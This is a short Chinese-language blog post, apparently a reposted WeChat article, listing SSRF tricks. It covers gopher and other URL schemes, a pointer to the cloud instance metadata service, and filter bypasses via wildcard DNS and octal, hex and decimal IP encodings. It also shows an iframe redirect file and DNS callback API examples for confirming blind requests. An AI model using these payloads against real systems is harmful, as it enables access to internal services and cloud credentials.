关于一些SSRF的技巧

admin
admin
admin
138883
文章
114
评论
2021年7月26日22:14:30评论73 views字数 968阅读3分13秒阅读模式

关于SSRF大家可能熟悉常见的无非就是gopher:// 、dict:// 、php:// ,但是实际上不仅仅这些,还有的是jar:// 、tftp://等等很多~以至于他们怎么玩,在这里我先卖给关子(日后再研究)


有关gopher://的文章可以看一下:https://ricterz.me/posts/%E5%88%A9%E7%94%A8%20gopher%20%E5%8D%8F%E8%AE%AE%E6%8B%93%E5%B1%95%E6%94%BB%E5%87%BB%E9%9D%A2


以及https://joychou.org/web/phpssrf.html


这里我就不再多讲ssrf究竟是个撒嘞~


然后类似于一些云服务,可以这么玩

关于一些SSRF的技巧

关于一些SSRF的技巧

这里的文章讲的比较详细点了http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html


这里关于一些ssrf的绕过技巧

Wildcard DNS

10.0.0.1.xip.io www.10.0.0.1.xip.io mysite.10.0.0.1.xip.io foo.bar.10.0.0.1.xip.io

Link: http://xip.io

10.0.0.1.nip.io app.10.0.0.1.nip.io customer1.app.10.0.0.1.nip.io customer2.app.10.0.0.1.nip.io otherapp.10.0.0.1.nip.io

Link: http://nip.io


或者

http://0177.1/
http://0x7f.1/
https://520968996


再或者用一些比较奇葩的思路

ssrf.php

<iframe src="http://10.0.0.1">

访问的时候直接http://a.com/ssrf.php就OK了!


利用CloudEye Api获取请求是否成功

关于一些SSRF的技巧


示例:http://ijiandao.top/api/{key}/8r.f4/dns

示例:http://ijiandao.top/api/{key}/8r.f4/web


关于一些SSRF的技巧

还有啥?我想想啊,今天先这样我,我要下班了……别拦我

以上临时工所述
我司一概不负责

本文始发于微信公众号(逢人斗智斗勇):关于一些SSRF的技巧

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月26日22:14:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于一些SSRF的技巧https://cn-sec.com/archives/343702.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息